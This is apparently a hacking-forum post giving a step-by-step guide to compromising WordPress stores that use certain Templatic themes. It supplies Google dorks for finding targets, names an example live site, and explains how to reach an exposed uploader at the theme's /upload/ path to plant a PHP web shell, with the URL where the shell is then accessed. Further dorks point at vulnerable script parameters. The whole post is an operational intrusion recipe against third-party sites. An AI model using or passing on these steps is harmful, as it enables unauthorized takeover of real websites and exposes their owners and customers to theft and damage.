WordPress Themes Vulnerable
WordPress Themes Vulnerable to this Exploit:
Quote:WPStoreTutorial
eShop
KidzStore
Emporium
Store
eCommerce
framework
1. Go to google and search this dork:
Quote:"StoreBox by Templatic" intext:rings2. Click on any Website
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse
Example:
http://shopshack.net
Right Click and click view page source:
3. Locate theme within source code.
Which is:
Quote:http://shopshack.net/wp-content/themes/framework/
Notice that the theme is /framework/
We now have found a vulnerable theme to test exploit.
4. Next, add /upload/ to the end of the URL after /framework/
5. Use the Uploader to upload your shell. (Supports: .php .txt .html)
Shell Acces:
Quote:/wp-content/uploads/products_img/SHELL-NAME-HERE.phpExample:
Quote:http://shopshack.net/wp-content/uploads/...mg/dir.phpAnother Google DorK:
Quote:inurl:/wp-content/themes/wpstoreCredits: HackForums
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=